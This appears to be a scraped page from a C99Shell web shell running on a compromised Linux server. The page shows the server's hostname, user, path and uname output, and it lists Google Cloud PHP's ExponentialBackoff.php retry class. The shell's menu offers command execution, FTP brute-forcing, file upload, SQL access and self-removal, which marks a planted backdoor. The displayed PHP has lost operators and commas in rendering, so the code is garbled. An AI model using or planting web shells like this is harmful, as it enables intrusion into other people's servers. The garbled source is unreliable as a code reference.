!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.qr.picotech.app/public_html/vendor/google/cloud-core/src/   drwxr-xr-x
Free 29.25 GB of 117.98 GB (24.79%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ExponentialBackoff.php (4.7 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Copyright 2016 Google Inc. All Rights Reserved.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

namespace Google\Cloud\Core;

/**
 * Exponential backoff implementation.
 */
class ExponentialBackoff
{
    const 
MAX_DELAY_MICROSECONDS 60000000;

    
/**
     * @var int
     */
    
private $retries;

    
/**
     * @var callable|null
     */
    
private $retryFunction;

    
/**
     * @var callable
     */
    
private $delayFunction;

    
/**
     * @var callable|null
     */
    
private $calcDelayFunction;

    
/**
     * @var callable|null
     */
    
private $retryListener;

    
/**
     * @param int $retries [optional] Number of retries for a failed request.
     * @param callable $retryFunction [optional] returns bool for whether or not
     *        to retry
     * @param callable $retryListener [optional] Runs after the
     *        $retryFunction. Unlike the $retryFunction,this function isn't
     *        responsible to decide if a retry should happen or not, but it gives the
     *        users flexibility to consume exception messages and add custom logic.
     *        Function definition should match:
     *            function (\Exception $e, int $attempt, array $arguments): array
     *        Ex: One might want to change headers on every retry, this function can
     *        be used to achieve such a functionality.
     */
    
public function __construct(
        
$retries null,
        callable 
$retryFunction null,
        callable 
$retryListener null
    
) {
        
$this->retries $retries !== null ? (int) $retries 3;
        
$this->retryFunction $retryFunction;
        
$this->retryListener $retryListener;
        
// @todo revisit this approach
        // @codeCoverageIgnoreStart
        
$this->delayFunction = static function ($delay) {
            
usleep($delay);
        };
        
// @codeCoverageIgnoreEnd
    
}

    
/**
     * Executes the retry process.
     *
     * @param callable $function
     * @param array $arguments [optional]
     * @return mixed
     * @throws \Exception The last exception caught while retrying.
     */
    
public function execute(callable $function, array $arguments = [])
    {
        
$delayFunction $this->delayFunction;
        
$calcDelayFunction $this->calcDelayFunction ?: [$this'calculateDelay'];
        
$retryAttempt 0;
        
$exception null;
        while (
true) {
            try {
                return 
call_user_func_array($function$arguments);
            } catch (
\Exception $exception) {
                if (
$this->retryFunction) {
                    if (!
call_user_func($this->retryFunction$exception$retryAttempt)) {
                        throw 
$exception;
                    }
                }

                if (
$retryAttempt >= $this->retries) {
                    break;
                }

                
$delayFunction($calcDelayFunction($retryAttempt));
                
$retryAttempt++;
                if (
$this->retryListener) {
                    
// Developer can modify the $arguments using the retryListener
                    // callback.
                    
call_user_func_array(
                        
$this->retryListener,
                        [
$exception$retryAttempt, &$arguments]
                    );
                }
            }
        }

        throw 
$exception;
    }

    
/**
     * If not set, defaults to using `usleep`.
     *
     * @param callable $delayFunction
     * @return void
     */
    
public function setDelayFunction(callable $delayFunction)
    {
        
$this->delayFunction $delayFunction;
    }

    
/**
     * If not set, defaults to using
     * {@see \Google\Cloud\Core\ExponentialBackoff::calculateDelay()}.
     *
     * @param callable $calcDelayFunction
     * @return void
     */
    
public function setCalcDelayFunction(callable $calcDelayFunction)
    {
        
$this->calcDelayFunction $calcDelayFunction;
    }

    
/**
     * Calculates exponential delay.
     *
     * @param int $attempt The attempt number used to calculate the delay.
     * @return int
     */
    
public static function calculateDelay($attempt)
    {
        return 
min(
            
mt_rand(01000000) + (pow(2$attempt) * 1000000),
            
self::MAX_DELAY_MICROSECONDS
        
);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--